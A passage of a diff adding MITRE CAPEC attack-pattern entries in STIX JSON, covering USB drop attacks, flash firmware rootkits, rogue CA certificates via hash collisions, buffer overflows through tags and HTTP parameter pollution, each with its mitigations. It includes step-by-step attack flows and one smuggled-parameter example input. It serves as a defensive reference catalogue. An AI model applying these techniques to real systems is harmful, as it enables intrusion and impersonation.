"http://cwe.mitre.org/data/definitions/1299.html" + }, + { + "description": "Replication Through Removable Media", + "external_id": "T1091", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1091" + }, + { + "description": "Communication Through Removable Media", + "external_id": "T1092", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1092" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + } + ], + "id": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "USB Memory Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Target System: In certain cases, the adversary will explore an organization's network to determine a specific target machine to exploit based on the information it contains or privileges the main user may possess.

    2. Techniques
    If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Experiment

  1. Develop or Obtain malware and install on a USB device: The adversary develops or obtains the malicious software necessary to exploit the target system, which they then install on an external USB device such as a USB flash drive.

    2. Techniques
    The adversary can develop or obtain malware for to perform a variety of tasks such as sniffing network traffic or monitoring keystrokes.

Exploit

  1. Connect or deceive a user into connecting the infected USB device: Once the malware has been placed on an external USB device, the adversary connects the device to the target system or deceives a user into connecting the device to the target system such as in a USB Drop Attack.

    2. Techniques
    The adversary connects the USB device to a specified target system or performs a USB Drop Attack, hoping a user will find and connect the USB device on their own. Once the device is connected, the malware executes giving the adversary access to network traffic, credentials, etc.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of physical access to the device being attacked.", + "Information pertaining to the target organization on how to best execute a USB Drop Attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper, physical system access is regulated to prevent an adversary from physically connecting a malicious USB device themself.", + "id": "course-of-action--28a045ca-1d19-4806-8fe8-289661aa8f3d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1223d74f-6652-40ea-92ee-4f1a2c91d676", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--28a045ca-1d19-4806-8fe8-289661aa8f3d", + "spec_version": "2.1", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use anti-virus and anti-malware tools which can prevent malware from executing if it finds its way onto a target system. Additionally, make sure these tools are regularly updated to contain up-to-date virus and malware signatures.", + "id": "course-of-action--23616f83-6ea1-4f30-a9f5-65259313e80b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--83689bae-01f6-4ed3-b3f8-66cf8e657475", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--23616f83-6ea1-4f30-a9f5-65259313e80b", + "spec_version": "2.1", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not connect untrusted USB devices to systems connected on an organizational network. Additionally, use an isolated testing machine to validate untrusted devices and confirm malware does not exist.", + "id": "course-of-action--c295b380-bcd9-4e87-88dc-341fc0ad6922", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dfbd2aef-9f4e-43aa-819c-14c5b16d3c23", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c295b380-bcd9-4e87-88dc-341fc0ad6922", + "spec_version": "2.1", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device.", + "external_references": [ + { + "external_id": "CAPEC-458", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/458.html" + }, + { + "external_id": "CWE-1282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1282.html" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Robert Lemos, Researchers: Rootkits headed for BIOS, 2006, SecurityFocus", + "external_id": "REF-394", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Flash Memory Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for \"flash\" based malware or malicious logic.\n One of the pernicious characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card's chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their \"to be signed\" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.", + "external_references": [ + { + "external_id": "CAPEC-459", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/459.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/295.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 Considered Harmful Today: Creating a Rogue CA Certificate, 2008--12---30, Phreedom.org", + "external_id": "REF-395", + "source_name": "reference_from_CAPEC", + "url": "http://www.phreedom.org/research/rogue-ca/" + }, + { + "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 considered harmful today, 2009--12", + "external_id": "REF-587", + "source_name": "reference_from_CAPEC", + "url": "https://www.win.tue.nl/hashclash/rogue-ca/#Ref" + } + ], + "id": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Creating a Rogue Certification Authority Certificate", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n MD5 Collisions\n The MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.See also: CVE-2004-2761", + "\n SHA1 Collisions\n The SHA1 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.See also: CVE-2005-4900", + "\n PKI Infrastructure vulnerabilities\n Research has show significant vulnerabilities in PKI infrastructure. Trusted certificate authorities have been shown to use weak hashing algorithms after attacks have been demonstrated against those algorithms. Additionally, reliable methods have been demonstrated for generated MD5 collisions that could be used to generate malicious CSRs.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Craft Certificates: The adversary crafts two different, but valid X.509 certificates that when hashed with an insufficiently collision resistant hashing algorithm would yield the same value.

  2. Send CSR to Certificate Authority: The adversary sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key.

Exploit

  1. Insert Signed Blob into Unsigned Certificate: The adversary takes the signed blob and inserts it into the second X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob is valid in the second certificate. The result is two certificates that appear to be signed by a valid certificate authority despite only one having been signed.

", + "x_capec_extended_description": "\n Alternatively, the second certificate could be a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker's first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and any certificates that it signs. As a result, the adversary is able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed" + ], + "x_capec_resources_required": [ + "Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance", + "A valid certificate request and a malicious certificate request with identical hash values" + ], + "x_capec_skills_required": { + "High": "An attacker must be able to craft two X.509 certificates that produce the same hash value", + "Medium": "Knowledge needed to set up a certification authority" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Certification Authorities need to stop using deprecated or cryptographically insecure hashing algorithms to hash the certificates that they are about to sign. Instead they should be using stronger hashing functions such as SHA-256 or SHA-512.", + "id": "course-of-action--aef26c23-42e4-46ac-a6ce-61224191c8a3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-459-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--323c57c1-b086-4b0d-81cb-1cf8a0bb21d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aef26c23-42e4-46ac-a6ce-61224191c8a3", + "spec_version": "2.1", + "target_ref": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. The adversary crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow.", + "external_references": [ + { + "external_id": "CAPEC-46", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/46.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Overflow Variables and Tags", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag.See also: CVE-1999-0946", + "\n A buffer overflow in Exim allows local users to gain root privileges by providing a long :include: option in a .forward file.See also: CVE-1999-0971" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries look for applications or programs that accept formatted files, such as configuration files, as input.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    Knowing the type of file that an application takes as input, the adversary takes a normal input file and modifies a single variable or tag to contain a large amount of data. If there is a crash, this means that a buffer overflow attack is possible. The adversary will keep changing single variables or tags one by one until they see a change in behavior.

  2. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: The adversary will upload the crafted file to the application, causing a buffer overflow.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e" + ], + "x_capec_prerequisites": [ + "The target program consumes user-controllable data in the form of tags or variables.", + "The target program does not perform sufficient boundary checking." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eaa7c808-388e-4b0b-a9c7-56895d4b1188", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--45d81297-fcc7-4abb-88f9-43cae938e07e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2abe8d6-7c9a-4465-ad34-052a868dc3b0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not trust input data from user. Validate all user input.", + "id": "course-of-action--4d65b6e1-548b-4925-96e0-a2948cea8f7e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-46-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--933f0265-0d58-4da3-be7f-f584f3b4b55b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d65b6e1-548b-4925-96e0-a2948cea8f7e", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds duplicate HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.", + "external_references": [ + { + "external_id": "CAPEC-460", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/460.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-147", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/147.html" + }, + { + "external_id": "CWE-235", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/235.html" + }, + { + "description": "Web Parameter Tampering", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Web_Parameter_Tampering" + }, + { + "description": "Luca Carettoni, Stefano di Paola, HTTP Parameter Pollution (OWASP EU09 Poland), 2008, The Open Web Application Security Project (OWASP)", + "external_id": "REF-397", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-606", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.html" + } + ], + "id": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "modified": "2022-02-22T00:00:00.000Z", + "name": "HTTP Parameter Pollution (HPP)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find User Input: The adversary finds anywhere in the web application that uses user-supplied input in a form or action. This can also be found by looking at parameters in the URL in the navigation bar of the browser

Experiment

  1. Add Duplicate Parameter Values: Once the adversary has identified what user input is used as HTTP parameters, they will add duplicates to each parameter one by one to observe the results. If the response from the HTTP request shows the duplicate parameter value concatenated with the original parameter value in some way, or simply just the duplicate parameter value, then HPP is possible.

    2. Techniques
    In the URL, add a duplicate parameter by using the \"&\" delimiter. For example \"par1=val1\" becomes \"par1=val1&par1=val2\". Depending on the backend API, this could be treated as \"par1=val1, val2\", which could lead to par1 being set to val2, ignoring val1.
    If the request is created based on user input directly on the page, the adversary will test by adding an encoded delimiter to the input. For example, the adverary might supply \"1000%26action=withdraw\" and the backend might interpret a POST request with the paramters \"action=deposit&amount=1000&action=withdraw\"

Exploit

  1. Leverage HPP: Once the adversary has identified how the backend handles duplicate parameters, they will leverage this by polluting the paramters in a way that benefits them. In some cases, hardcoded parameters will be disregarded by the backend. In others, the adversary can bypass a WAF that might only check a parameter before it has been concatenated by the backend, resulting in malicious queries getting through.

", + "x_capec_prerequisites": [ + "HTTP protocol is used with some GET/POST parameters passed" + ], + "x_capec_resources_required": [ + "Any tool that enables intercepting and tampering with HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests", + "id": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1f5c4e8-5bc1-44be-a928-3f47b794cce5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "spec_version": "2.1", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform URL encoding", + "id": "course-of-action--a8f935d9-6238-4a25-98d1-ec2b90cf2dc5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c9d7213f-0542-4267-896f-cde00d9ba131", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8f935d9-6238-4a25-98d1-ec2b90cf2dc5", + "spec_version": "2.1", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use strict regular expressions in URL rewriting", + "id": "course-of-action--38331521-a7db-4428-92ae-dcc62432d4be", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48510a25-def9-4c25-85ee-67173f7f2246", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38331521-a7db-4428-92ae-dcc62432d4be", + "spec_version": "2.1", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Beware of multiple occurrences of a parameter in a Query String", + "id": "course-of-action--8846dae1-8419-4e74-8ec5-58bff613dbec", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + 